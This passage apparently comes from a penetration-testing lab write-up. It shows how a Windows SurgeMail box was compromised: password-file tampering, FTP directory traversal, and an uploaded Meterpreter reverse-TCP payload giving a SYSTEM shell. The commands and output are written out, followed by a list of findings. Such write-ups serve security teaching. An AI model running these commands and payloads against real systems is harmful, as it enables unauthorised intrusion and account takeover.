    SSL2_RC4_128_EXPORT40_WITH_MD5\n|_pop3-capabilities: USER SURGEMAIL UIDL TOP OK(K Capability list follows)\n3389\/tcp <span style=\"color: #0000ff;\">open<\/span>  microsoft-rdp Microsoft Terminal Service\n7025\/tcp <span style=\"color: #0000ff;\">open<\/span>  ssl\/http      DNews Web Based Manager\n| sslv2: server still supports SSLv2\n|       SSL2_DES_192_EDE3_CBC_WITH_MD5\n|       SSL2_IDEA_128_CBC_WITH_MD5\n|       SSL2_RC2_CBC_128_CBC_WITH_MD5\n|       SSL2_RC4_128_WITH_MD5\n|       SSL2_DES_64_CBC_WITH_MD5\n|_      SSL2_RC4_128_EXPORT40_WITH_MD5\n|_html-title: SurgeMail (killthen00b)\n|_http-favicon: Unknown favicon MD5: 803DA8BF442FFF23072386E2B5EF2928\n7443\/tcp <span style=\"color: #0000ff;\">open<\/span>  ssl\/http      Surgemail webmail (DNews based)\n| sslv2: server still supports SSLv2\n|       SSL2_DES_192_EDE3_CBC_WITH_MD5\n|       SSL2_IDEA_128_CBC_WITH_MD5\n|       SSL2_RC2_CBC_128_CBC_WITH_MD5\n|       SSL2_RC4_128_WITH_MD5\n|       SSL2_DES_64_CBC_WITH_MD5\n|_      SSL2_RC4_128_EXPORT40_WITH_MD5\n|_http-favicon: Unknown favicon MD5: 803DA8BF442FFF23072386E2B5EF2928\n|_html-title: SurgeMail Welcome Page\n1 service unrecognized despite returning <span style=\"color: #0000ff;\">data<\/span>. 
\nIf you know the service\/<span style=\"color: #0000ff;\">version<\/span>, please submit the following fingerprint \nat http:<span style=\"color: #008000;\">\/\/www.insecure.org\/cgi-bin\/servicefp-submit.cgi :<\/span>\nSF-Port21-TCP:V=5.21%I=7%D=5\/9%Time=4BE68D5E%P=i686-pc-linux-gnu%r(NULL,31\nSF:,\"<span style=\"color: #8b0000;\">220-Complete\\x20FTP\\x20server\\r\\n220\\x20FTP\\x20Server\\x20v\\x203\\.3\\.0\n<\/span>SF:\\r\\n\"<span style=\"color: #8b0000;\">)%r(GenericLines,31,<\/span>\"220-Complete\\x20FTP\\x20server\\r\\n220\\x20FTP\\x\nSF:20Server\\x20v\\x203\\.3\\.0\\r\\n\"<span style=\"color: #8b0000;\">)%r(Help,54,<\/span>\"220-Complete\\x20FTP\\x20server\nSF:\\r\\n220\\x20FTP\\x20Server\\x20v\\x203\\.3\\.0\\r\\n502\\x20Command\\x20not\\x20im\nSF:plemented:\\x20HELP\\r\\n\"<span style=\"color: #8b0000;\">)%r(SMBProgNeg,31,<\/span>\"220-Complete\\x20FTP\\x20server\nSF:\\r\\n220\\x20FTP\\x20Server\\x20v\\x203\\.3\\.0\\r\\n\"<span style=\"color: #8b0000;\">);\n<\/span>Service Info: Host: killthen00b; OS: Windows<\/pre>\n<p>Ok, so we have Qualcomm poppassd, Surgemail and some other stuff.<\/p>\n<p>Where to start ?\u00a0 This is what I did :<\/p>\n<p>Surgemail allows access to certain services via a webpage.\u00a0 Surgemail is a name that showed up a few times in the nmap services list.\u00a0 So it looks like Surgemail is responsible for the vast majority of the services on this machine.<\/p>\n<p>If you have to pick something to start with, and one application appears to be responsible for most of the services on the machine, then that application is a high-risk\/high-impact service and a logical starting point.<\/p>\n<p>In the FTP listing of the root of the drive, I noticed 2 references to Surgemail :<\/p>\n<ul>\n<li>a folder called \"surgemail\"<\/li>\n<li>a file called \"surgemail_installer.exe\"<\/li>\n<\/ul>\n<p>I downloaded the installer file (<em>which was still possible when I was connected to the lab<\/em>) and installed it on a test box.\u00a0 During the installation 
of surgemail on my test box, I created an admin account (user: admin\/ password: admin) and tried to find the file where the admin username\/password was stored.\u00a0 I discovered that credentials get stored into a file called nwauth.add<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image55.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image55_thumb.png\" alt=\"image\" width=\"529\" height=\"439\" border=\"0\" \/><\/a><\/p>\n<p>So let's see if we can use this to get ourselves an admin account in surgemail on the lab machine... Maybe the hashing\/encoding of the password will work for any account (no salt etc).<\/p>\n<p>Still connected via FTP, I downloaded the nwauth.add file from the server<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">250 Directory changed to \"<span style=\"color: #8b0000;\">\/MyDocuments\/......\/......\/......\/......<\/span>\".\nftp&gt; cd surgemail\n250 Directory changed to \"<span style=\"color: #8b0000;\">\/MyDocuments\/......\/......\/......\/......\/surgemail<\/span>\".\nftp&gt; get nwauth.add\n<span style=\"color: #0000ff;\">local<\/span>: nwauth.add remote: nwauth.add\n200 PORT command successful.\n150 Opening BINARY mode data connection for nwauth.add\n226 Transfer complete.\n227 bytes received in 0.00 secs (152.9 kB\/s)\nftp&gt; bye\n221 Goodbye.\n\nroot@krypt2:\/vpn\/70# cat nwauth.add\nn00b@killthen00b:{ssha}floeVmRUcb7ku3ChQzBdC4acP3ugCInK:created=\"<span style=\"color: #8b0000;\">1272891311<\/span>\" \nmailaccess=\"\" mailstatus=\"\" admin_access=\"\" quota=\"\" expire=\"<span style=\"color: #8b0000;\">0<\/span>\" full_name=\"\" \nmax_in=\"\" phone=\"\" smsto=\"\" user_access=\"\" alias_quota=\"\" list_quota=\"\"<\/pre>\n<p>I simply changed the 
password for the n00b user, added a new user corelanc0d3r (again with the same \"admin\" hash), and then uploaded the file. I also added a user devil (again with the same password), and uploaded the file again to the server.<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">peter@krypt2:\/vpn\/70$ cat nwauth.<span style=\"color: #0000ff;\">add<\/span>\ncorelanc0d3r@killthen00b:{ssha}fqwU1VAdjf6TTr7Av3pUYDxHJ6Y8TQxt:\nn00b@killthen00b:{ssha}fqwU1VAdjf6TTr7Av3pUYDxHJ6Y8TQxt:\ndevil@killthen00b:{ssha}fqwU1VAdjf6TTr7Av3pUYDxHJ6Y8TQxt:<\/pre>\n<p><em>(again, when I performed the exercise, this file was readable and could be downloaded.\u00a0 It looks like muts and his friends got fed up with people trying to change passwords and they finally blocked access to this file) <\/em><\/p>\n<p>Anyways, I uploaded the modified nwauth.add file and tried to log in to the domadmin (Domain Management) page using the username \"corelanc0d3r\" and password \"admin\" combination.<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image32.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb32.png\" alt=\"image\" width=\"348\" height=\"198\" border=\"0\" \/><\/a><\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/70_domadmin1.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"70_domadmin1\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/70_domadmin1_thumb.png\" alt=\"70_domadmin1\" width=\"497\" height=\"311\" border=\"0\" \/><\/a><\/p>\n<p>Result :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/71_domadmin2.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" 
decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"71_domadmin2\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/71_domadmin2_thumb.png\" alt=\"71_domadmin2\" width=\"370\" height=\"231\" border=\"0\" \/><\/a><\/p>\n<p>Nice.<\/p>\n<p>Let's see if I can create some stuff here (just for fun). I decided to create a little blog and publish it on the server :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/corelanc0d3r_blog.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"corelanc0d3r_blog\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/corelanc0d3r_blog_thumb.png\" alt=\"corelanc0d3r_blog\" width=\"477\" height=\"298\" border=\"0\" \/><\/a><\/p>\n<p>muahaha...\u00a0\u00a0 ok, enough playing.\u00a0\u00a0 So I found a second serious vulnerability on this box.\u00a0 But I should stay focussed and try to 0wn the machine in order to grab the \"secret key\" from the machine, which is what is really needed to complete this challenge. 
Focus Peter, Focus.<\/p>\n<p>I went back to the surgemail home page and clicked on the \"webmail\" link.<\/p>\n<p>When looking at the WebMail login page, I noticed this :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image14.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb14.png\" alt=\"image\" width=\"462\" height=\"241\" border=\"0\" \/><\/a><\/p>\n<p>WebMail appears to be an executable, in the scripts folder.\u00a0 So what if we can put our own executable in this \"scripts\" folder and call it from the web browser ?<\/p>\n<p>First, using metasploit's msfpayload, let's create an evil executable (Meterpreter reverse tcp shell) that would give us a nice shell :<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">.\/msfpayload windows\/meterpreter\/reverse_tcp RHOST=192.168.6.114 RPORT=4444 LHOST=192.168.6.114 LPORT=4444 X &gt; _corelanc0d3r.exe<\/pre>\n<p>I then uploaded the file to the scripts folder via the FTP directory traversal bug :<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">root@krypt2:\/vpn\/70# ftp 192.168.6.70\nConnected to 192.168.6.70.\n220-Complete FTP server\n220 FTP Server v 3.3.0\nName (192.168.6.70:peter): devil\n331 Password required for devil\nPassword:\n230 User devil logged in.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp&gt; cd \\..\\..\\..\\  \n250 Directory changed to \"<span style=\"color: #8b0000;\">\/MyDocuments\/......<\/span>\".\nftp&gt; cd \\..\\..\\..\\\n250 Directory changed to \"<span style=\"color: #8b0000;\">\/MyDocuments\/......\/......<\/span>\".\nftp&gt; cd \\..\\..\\..\\\n250 Directory changed to \"<span style=\"color: 
#8b0000;\">\/MyDocuments\/......\/......\/......<\/span>\".\nftp&gt; cd surgemail\n250 Directory changed to \"<span style=\"color: #8b0000;\">\/MyDocuments\/......\/......\/......\/surgemail<\/span>\".\nftp&gt; cd scripts\n250 Directory changed to \"<span style=\"color: #8b0000;\">\/MyDocuments\/......\/......\/......\/surgemail\/scripts<\/span>\".\nftp&gt; bin\n200 Type set to I\nftp&gt; put _corelanc0d3r.exe\nlocal: _corelanc0d3r.exe remote: _corelanc0d3r.exe\n200 PORT command successful.\n150 Opening BINARY mode <span style=\"color: #0000ff;\">data<\/span> connection for _corelanc0d3r.exe\n226 Transfer complete.\n37888 bytes sent in 0.54 secs (69.1 kB\/s)<\/pre>\n<p>Next, set up a metasploit multi handler and listen for incoming connections :<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">root@krypt2:\/pentest\/exploits\/framework3# .\/msfcli multi\/handler \n             payload=windows\/meterpreter\/reverse_tcp \n             lhost=192.168.6.114 lport=4444 E\n[*] Please wait while we <span style=\"color: #0000ff;\">load<\/span> the <span style=\"color: #0000ff;\">module<\/span> tree...\n[*] Started reverse handler on port 4444\n[*] Starting the payload handler...<\/pre>\n<p>Finally I called the executable from the web browser :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image15.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb15.png\" alt=\"image\" width=\"527\" height=\"127\" border=\"0\" \/><\/a><\/p>\n<p>and the meterpreter session kicked in :<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">[*] Please wait while we <span style=\"color: #0000ff;\">load<\/span> the <span style=\"color: 
#0000ff;\">module<\/span> tree...\n[*] Started reverse handler on port 4444\n[*] Starting the payload handler...\n[*] Sending stage (725504 bytes)\n[*] Meterpreter session 1 opened (192.168.6.114:4444 -&gt; 192.168.6.70:49604)<\/pre>\n<p>w00t.\u00a0 Game over ? - Maybe...\u00a0 What are my privileges ?<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">meterpreter &gt; getuid\nServer username: NT AUTHORITY\\SYSTEM\nmeterpreter &gt; ipconfig\n\nSoftware Loopback Interface 1\nHardware MAC: 00:00:00:00:00:00\nIP Address  : 127.0.0.1\nNetmask     : 255.0.0.0\n\n\n\nIntel(R) PRO\/1000 MT Network Connection\nHardware MAC: 00:50:56:bc:1c:69\nIP Address  : 192.168.6.70\nNetmask     : 255.255.255.0\n\n\nmeterpreter &gt; shell\nProcess 3656 created.\nChannel 1 created.\nMicrosoft Windows [Version 6.1.7600]\nCopyright (c) 2009 Microsoft Corporation.  All rights reserved.\n\nc:\\surgemail\\scripts&gt;<\/pre>\n<p>Yeah - game over. 
That's good enough for me.\u00a0 Let's see if we can find the file.<\/p>\n<blockquote><p>Usually, offsec will plant a \"proof\" .txt file on the Desktop of the administrator of the machine.\u00a0 But since I already had a shell, I decided to just list all txt files and see if I could see a file that looks as if it's a proof file.<\/p><\/blockquote>\n<p>I issued a \"dir *.txt \/S\" and evaluated the output, and I found (as expected) the proof file on the desktop of the administrator.<\/p>\n<p>I then used the shell to grab the secret file from the system :<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">c:\\surgemail\\scripts&gt;cd \/\ncd \/\n\nc:\\&gt;cd users\ncd users\n\nc:\\Users&gt;dir\ndir\n Volume in drive C has no label.\n Volume Serial Number is 0CDF-A146\n\n Directory of c:\\Users\n\n05\/04\/2010  12:10 AM    &lt;DIR&gt;          .\n05\/04\/2010  12:10 AM    &lt;DIR&gt;          ..\n05\/03\/2010  11:05 PM    &lt;DIR&gt;          Administrator\n05\/04\/2010  12:06 AM    &lt;DIR&gt;          devil\n05\/04\/2010  12:08 AM    &lt;DIR&gt;          ftp\n07\/13\/2009  09:08 PM    &lt;DIR&gt;          Public\n05\/04\/2010  12:10 AM    &lt;DIR&gt;          TEMP\n               0 File(s)              0 bytes\n               7 Dir(s)   2,687,561,728 bytes free\n\nc:\\Users&gt;cd Administrator\ncdcd Administrator\n\nc:\\Users\\Administrator&gt; Desktop\ncd Desktop\n\nc:\\Users\\Administrator\\Desktop&gt;dir\ndir\n Volume in drive C has no label.\n Volume Serial Number is 0CDF-A146\n\n Directory of c:\\Users\\Administrator\\Desktop\n\n05\/03\/2010  11:59 PM    &lt;DIR&gt;          .\n05\/03\/2010  11:59 PM    &lt;DIR&gt;          ..\n05\/03\/2010  11:59 PM                32 proof.txt\n               1 File(s)             32 bytes\n               2 Dir(s)   2,687,496,192 bytes free\n\nc:\\Users\\Administrator\\Desktop&gt;type proof.txt\ntype 
proof.txt\na61b0c1bf71267289efeecf778b1e51e\nc:\\Users\\Administrator\\Desktop&gt;<\/pre>\n<p>1:10 am. Game over. No need to look any further at this point. I didn't even consider running a full nmap anymore.<\/p>\n<p>What else can be done here ?<\/p>\n<p>Basically, everything you want. Create an admin user, rdp into the machine, run hashdump, use this machine to pivot into other machines... etc etc<\/p>\n<p>But I'm a good boy... I just went ahead and submitted the key ...\u00a0 and earned another 25 points.<\/p>\n<p>&nbsp;<\/p>\n<h4>Conclusions :<\/h4>\n<p>I found a number of critical vulnerabilities on this machine.\u00a0 Because of time constraints, as well as the fact that I already owned the machine, I didn't really look any further after I got hold of the proof file.<\/p>\n<p>So this list may be far from complete :<\/p>\n<ul>\n<li>FTP server is vulnerable to a directory traversal attack<\/li>\n<li>FTP server allows anonymous access (may not be a vulnerability by itself)<\/li>\n<li>insecure file permissions on the surgemail folder, allowing files to be downloaded and uploaded. 
This leads to\n<ul>\n<li>the ability to change the login credentials and gain\n<ul>\n<li>admin access to the surgemail system<\/li>\n<li>access to the mailbox of other users.\u00a0 I changed the password of the \"devil\" account as well (set pw to \"admin\"), changed a parameter in the webadmin.ini file, and I could read the mails from this mailbox.\u00a0 The mailbox contained 3 log entries (surgemail server restart notifications, with some interesting info)<\/li>\n<li>etc (use your imagination)<\/li>\n<\/ul>\n<\/li>\n<li>the ability to upload an evil executable into the \"scripts\" folder and execute it in the context of the server, gaining full system access (and allowing an attacker to grab the \"proof.txt\" file that contained the secret key)<\/li>\n<\/ul>\n<\/li>\n<li>weak hash\/cipher algorithms (SSL services allow the use of RC2, MD5, etc., which are considered to be weak)<\/li>\n<li>access to admin pages\/webmail (= potentially sensitive information)\/etc. webpages should be forced to use SSL. (While SSL access was possible over port 7443, the default port (80) was not encrypted, and that's what most people might use. 
Just a simple redirect on port 80, forcing users to use SSL, might do the job as well)<\/li>\n<li>Based on the contents of the avast.log file I found on the machine, surgemail may not be protected by avast antivirus<a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image36.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb36.png\" alt=\"image\" width=\"396\" height=\"109\" border=\"0\" \/><\/a><\/li>\n<\/ul>\n<blockquote><p>(In fact, I found a good amount of log files in the surgemail folder - unprotected and waiting to be altered after a compromise)<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image251.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image251_thumb.png\" alt=\"image\" width=\"499\" height=\"53\" border=\"0\" \/><\/a><\/p><\/blockquote>\n<ul>\n<li>Use valid certificates (instead of an invalid self-signed certificate)<a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image33.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb33.png\" alt=\"image\" width=\"303\" height=\"53\" border=\"0\" \/><\/a><\/li>\n<li>insecure firewall configurations\n<ul>\n<li>too many ports open (more than needed to host services)<\/li>\n<li>allowing outbound traffic when it's not really necessary (allowing an attacker to set up a reverse tunnel)<\/li>\n<\/ul>\n<\/li>\n<li>client-facing services running with system privileges, increasing the impact when a vulnerability gets exploited :<\/li>\n<\/ul>\n<pre 
style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">meterpreter &gt; ps    \n\nProcess list\n============\n\n PID   Name                    Arch  User                          Path\n ---   ----                    ----  ----                          ----\n 0     [System Process]                                            \n 4     System                  x86                                 \n 260   smss.exe                x86   NT AUTHORITY\\SYSTEM           \\SystemRoot\\System32\\smss.exe\n 348   csrss.exe               x86   NT AUTHORITY\\SYSTEM           C:\\Windows\\system32\\csrss.exe\n 392   wininit.exe             x86   NT AUTHORITY\\SYSTEM           C:\\Windows\\system32\\wininit.exe\n 480   services.exe            x86   NT AUTHORITY\\SYSTEM           C:\\Windows\\system32\\services.exe\n 488   lsass.exe               x86   NT AUTHORITY\\SYSTEM           C:\\Windows\\system32\\lsass.exe\n 500   lsm.exe                 x86   NT AUTHORITY\\SYSTEM           C:\\Windows\\system32\\lsm.exe\n 596   svchost.exe             x86   NT AUTHORITY\\SYSTEM           C:\\Windows\\system32\\svchost.exe\n 668   svchost.exe             x86   NT AUTHORITY\\NETWORK SERVICE  C:\\Windows\\system32\\svchost.exe\n 760   svchost.exe             x86   NT AUTHORITY\\LOCAL SERVICE    C:\\Windows\\System32\\svchost.exe\n 816   svchost.exe             x86   NT AUTHORITY\\SYSTEM           C:\\Windows\\System32\\svchost.exe\n 860   svchost.exe             x86   NT AUTHORITY\\SYSTEM           C:\\Windows\\system32\\svchost.exe\n 936   svchost.exe             x86   NT AUTHORITY\\LOCAL SERVICE    C:\\Windows\\system32\\svchost.exe\n 1048  svchost.exe             x86   NT AUTHORITY\\NETWORK SERVICE  C:\\Windows\\system32\\svchost.exe\n 1160  spoolsv.exe             x86   NT AUTHORITY\\SYSTEM           C:\\Windows\\System32\\spoolsv.exe\n 1196  svchost.exe             x86   NT AUTHORITY\\LOCAL SERVICE    
C:\\Windows\\system32\\svchost.exe\n 1364  CompleteFTPService.exe  x86   NT AUTHORITY\\SYSTEM           C:\\Program Files\\Complete FTP\\Server\\CompleteFTPService.exe\n 1664  surgemail.exe           x86   NT AUTHORITY\\SYSTEM           c:\\surgemail\\surgemail.exe\n 1828  swatch.exe              x86   NT AUTHORITY\\SYSTEM           c:\\surgemail\\swatch.exe\n 1884  nwauth.exe              x86   NT AUTHORITY\\SYSTEM           c:\\surgemail\\nwauth.exe\n 328   WmiPrvSE.exe            x86   NT AUTHORITY\\SYSTEM           C:\\Windows\\system32\\wbem\\wmiprvse.exe\n 1304  SearchIndexer.exe       x86   NT AUTHORITY\\SYSTEM           C:\\Windows\\system32\\SearchIndexer.exe\n 2260  sppsvc.exe              x86   NT AUTHORITY\\NETWORK SERVICE  C:\\Windows\\system32\\sppsvc.exe\n 2588  svchost.exe             x86   NT AUTHORITY\\SYSTEM           C:\\Windows\\System32\\svchost.exe\n 3064  svchost.exe             x86   NT AUTHORITY\\LOCAL SERVICE    C:\\Windows\\system32\\svchost.exe\n 848   csrss.exe               x86   NT AUTHORITY\\SYSTEM           C:\\Windows\\system32\\csrss.exe\n 748   winlogon.exe            x86   NT AUTHORITY\\SYSTEM           C:\\Windows\\system32\\winlogon.exe\n 784   LogonUI.exe             x86   NT AUTHORITY\\SYSTEM           C:\\Windows\\system32\\LogonUI.exe\n 3912  csrss.exe               x86   NT AUTHORITY\\SYSTEM           C:\\Windows\\system32\\csrss.exe\n 3696  winlogon.exe            x86   NT AUTHORITY\\SYSTEM           C:\\Windows\\system32\\winlogon.exe\n 148   taskhost.exe            x86   killthen00b\\Administrator     C:\\Windows\\system32\\taskhost.exe\n 1856  rdpclip.exe             x86   killthen00b\\Administrator     C:\\Windows\\system32\\rdpclip.exe\n 3788  dwm.exe                 x86   killthen00b\\Administrator     C:\\Windows\\system32\\Dwm.exe\n 3916  explorer.exe            x86   killthen00b\\Administrator     C:\\Windows\\Explorer.EXE\n 2000  jusched.exe             x86   killthen00b\\Administrator     C:\\Program 
Files\\Common Files\\Java\\Java Update\\jusched.exe\n 3152  python.exe              x86   killthen00b\\Administrator     C:\\Python26\\python.exe\n 316   conhost.exe             x86   killthen00b\\Administrator     C:\\Windows\\system32\\conhost.exe\n 884   WmiPrvSE.exe            x86   NT AUTHORITY\\NETWORK SERVICE  C:\\Windows\\system32\\wbem\\wmiprvse.exe\n 3568  _corelanc0d3r.exe       x86   NT AUTHORITY\\SYSTEM           c:\\surgemail\\scripts\\_corelanc0d3r.exe\n 340   VSSVC.exe               x86   NT AUTHORITY\\SYSTEM           C:\\Windows\\system32\\vssvc.exe\n 3968  svchost.exe             x86   NT AUTHORITY\\SYSTEM           C:\\Windows\\System32\\svchost.exe\n 2116  TrustedInstaller.exe    x86   NT AUTHORITY\\SYSTEM           C:\\Windows\\servicing\\TrustedInstaller.exe<\/pre>\n<p>Anyways, there might be many more, but I went straight to the next challenge.<\/p>\n<p>(Based on <a title=\"http:\/\/www.exploit-db.com\/exploits\/5259\" href=\"http:\/\/www.exploit-db.com\/exploits\/5259\">http:\/\/www.exploit-db.com\/exploits\/5259<\/a>, the IMAP service, for example, may be vulnerable to a post-AUTH bug.\u00a0 Since I have been able to change passwords for surgemail accounts, it may have been possible to exploit this bug and use it to gain system access again. But I didn't try, because I had already achieved the goal : get the key from the text file.)<\/p>\n<blockquote><p>Note : the admin who set up this machine should either get trained, or fired. Does anyone know a decent training facility ?<\/p><\/blockquote>\n<p>&nbsp;<\/p>\n<h3>Challenge 2 : Ghost<\/h3>\n<p>This was a fun but painful\/hard one. 
In addition to that (and unfortunately for me), I had to spend most of the day (Monday) in the hospital...<\/p>\n<p>I was happy to see that my friends at Corelan Team continued their evil work in the meantime.\u00a0 It was also nice to see that they applied the same logic and scripts\/exploits that I was using\/trying.\u00a0 So they nailed the challenge before I could... and that's awesome.<\/p>\n<p>This is what I did to \"bust Ghost\" :<\/p>\n<p>A portscan against 192.168.6.66\/67\/68 revealed only one open port: tcp\/80 (http), serving a webpage that looks like this :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image68.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image68_thumb.png\" alt=\"image\" width=\"475\" height=\"307\" border=\"0\" \/><\/a><\/p>\n<p>Apparently the person\/people who set up this box tried very hard (<em>not hard enough though<\/em>) to make it look like an MS IIS server :<\/p>\n<ul>\n<li>they changed the server header<\/li>\n<li>they planted well-known folder structures on the server which are available on some IIS servers<\/li>\n<li>they used the asp file extension, which is usually linked to IIS (or Java Web Server)<\/li>\n<\/ul>\n<p>On top of that, they planted all kinds of \"slow down\"\/fake exercises (such as a nice script file called \"javascript\", basically randomizing the selection of pictures), and used some nice redirection techniques to make directory\/file bruteforcing a real pain.<\/p>\n<p>But I quickly figured out that this is not a Windows box running IIS. 
I did some folder bruteforcing and after filtering out some of the redirects I found some interesting folders.\u00a0 One of the folders displayed a basic folder browser (basically looking like something that is served via IIS) : http:\/\/192.168.6.66\/Sites<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image17.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb17.png\" alt=\"image\" width=\"217\" height=\"184\" border=\"0\" \/><\/a><\/p>\n<p>They even planted a file called \"ViewCode.asp\" on the server (size 0), probably in an attempt to slow down the attacker's process and make them focus on a known bug (but something that isn't real).<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image18.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb18.png\" alt=\"image\" width=\"338\" height=\"184\" border=\"0\" \/><\/a><\/p>\n<p>Nice try, but not good enough to convince me.<\/p>\n<p>On top of that, a quick xprobe also indicates that this is a Linux box :<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">root@krypt2:\/pentest\/enumeration# xprobe2 -v -p tcp:80:<span style=\"color: #0000ff;\">open<\/span> 192.168.6.66\n\nXprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu\n\n[+] Target is 192.168.6.66\n[+] Loading modules.\n[+] Following modules are loaded:\n[x] [1] ping:icmp_ping  -  ICMP echo discovery module\n[x] [2] ping:tcp_ping  -  TCP-based ping discovery module\n[x] [3] ping:udp_ping  -  UDP-based ping discovery module\n[x] [4] infogather:ttl_calc  -  TCP and 
UDP based TTL distance calculation\n[x] [5] infogather:portscan  -  TCP and UDP PortScanner\n[x] [6] fingerprint:icmp_echo  -  ICMP Echo request fingerprinting module\n[x] [7] fingerprint:icmp_tstamp  -  ICMP Timestamp request fingerprinting module\n[x] [8] fingerprint:icmp_amask  -  ICMP Address mask request fingerprinting module\n[x] [9] fingerprint:icmp_port_unreach  -  ICMP port unreachable fingerprinting module\n[x] [10] fingerprint:tcp_hshake  -  TCP Handshake fingerprinting module\n[x] [11] fingerprint:tcp_rst  -  TCP RST fingerprinting module\n[x] [12] fingerprint:smb  -  SMB fingerprinting module\n[x] [13] fingerprint:snmp  -  SNMPv2c fingerprinting module\n[+] 13 modules registered\n[+] Initializing scan engine\n[+] Running scan engine\n[-] ping:udp_ping module: <span style=\"color: #0000ff;\">no<\/span> closed\/<span style=\"color: #0000ff;\">open<\/span> UDP ports known on 192.168.6.66. <span style=\"color: #0000ff;\">Module<\/span> test failed\n[+] Host: 192.168.6.66 is up (Guess probability: 66%)\n[+] Target: 192.168.6.66 is alive. 
